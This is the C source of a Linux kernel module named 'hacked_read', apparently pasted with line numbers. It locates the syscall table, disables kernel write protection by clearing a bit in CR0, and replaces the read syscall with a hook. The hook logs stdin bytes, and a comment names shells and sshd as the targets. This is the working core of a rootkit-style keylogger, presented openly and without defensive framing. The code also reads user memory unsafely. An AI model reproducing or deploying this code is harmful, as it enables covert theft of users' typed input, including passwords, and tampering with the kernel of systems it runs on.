#include <linux/module.h>#include <linux/kernel.h>#include <linux/init.h>#

1. #include <linux/module.h>
2. #include <linux/kernel.h>
3. #include <linux/init.h>
4. #include <linux/slab.h>
5. #include <linux/string.h>
6. #include <linux/syscalls.h>
7. #include <linux/version.h>
8. #include <linux/unistd.h>
9.  
10. #include <linux/time.h>
11. #include <linux/preempt.h>
12.  
13. #include <asm/uaccess.h>
14. #include <asm/paravirt.h>
15. #include <asm-generic/bug.h>
16. #include <asm/segment.h>
17.  
18. #define BUFFER_SIZE 512
19.  
20. #define MODULE_NAME "hacked_read"
21.  
22. #define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
23. #define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )
24. #define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
25. #define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )
26.  
27. MODULE_DESCRIPTION( MODULE_NAME );
28. MODULE_VERSION( "0.1" );
29. MODULE_LICENSE( "GPL" );
30. MODULE_AUTHOR( "module author <mail@domain.com>" );
31.  
32. static char debug_buffer[ BUFFER_SIZE ];
33. unsigned long ( *original_read ) ( unsigned int, char *, size_t );
34. void **sct;
35. unsigned long icounter = 0;
36.  
37. static inline void rw_enable( void ) {
38. asm volatile ( "cli \n"
39. "pushq %rax \n"
40. "movq %cr0, %rax \n"
41. "andq $0xfffffffffffeffff, %rax \n"
42. "movq %rax, %cr0 \n"
43. "popq %rax " );
44. }
45.  
46. static inline uint64_t getcr0(void) {
47. register uint64_t ret = 0;
48. asm volatile (
49. "movq %%cr0, %0\n"
50. :"=r"(ret)
51. );
52. return ret;
53. }
54.  
55. static inline void rw_disable( register uint64_t val ) {
56. asm volatile(
57. "movq %0, %%cr0\n"
58. "sti "
59. :
60. :"r"(val)
61. );
62. }
63.  
64. static void* find_sym( const char *sym ) {
65. static unsigned long faddr = 0; // static !!!
66. // ----------- nested functions are a GCC extension ---------
67. int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
68. if( 0 == strcmp( (char*)data, sym ) ) {
69. faddr = addr;
70. return 1;
71. } else return 0;
72. };// --------------------------------------------------------
73. kallsyms_on_each_symbol( symb_fn, (void*)sym );
74. return (void*)faddr;
75. }
76.  
77. unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
78. unsigned long r = 1;
79. if ( fd != 0 ) { // fd == 0 --> stdin (sh, sshd)
80. return original_read( fd, buf, count );
81. } else {
82. icounter++;
83. if ( icounter % 1000 == 0 ) {
84. info( "test2 icounter = %ld\n", icounter );
85. info( "strlen( debug_buffer ) = %ld\n", strlen( debug_buffer ) );
86. }
87. r = original_read( fd, buf, count );
88. strncat( debug_buffer, buf, 1 );
89. if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )
90. debug_buffer[0] = '\0';
91. return r;
92. }
93. }
94.  
95. int hacked_read_init( void ) {
96. register uint64_t cr0;
97. info( "Module was loaded\n" );
98. sct = find_sym( "sys_call_table" );
99. original_read = (void *)sct[ __NR_read ];
100. cr0 = getcr0();
101. rw_enable();
102. sct[ __NR_read ] = hacked_read_test;
103. rw_disable( cr0 );
104. return 0;
105. }
106.  
107. void hacked_read_exit( void ) {
108. register uint64_t cr0;
109. info( "Module was unloaded\n" );
110. cr0 = getcr0();
111. rw_enable();
112. sct[ __NR_read ] = original_read;
113. rw_disable( cr0 );
114. }
115.  
116. module_init( hacked_read_init );
117. module_exit( hacked_read_exit );